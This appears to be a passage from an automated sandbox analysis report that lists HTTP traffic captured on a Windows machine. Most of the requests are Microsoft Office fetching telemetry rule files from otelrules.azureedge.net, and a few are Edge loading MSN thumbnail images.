Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1cLbwq?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1sFuPI?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAAAWUx?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAtK5aP?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB18CMuA?w=168&h=168&q=60&m=6&f=jpg&u=t HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
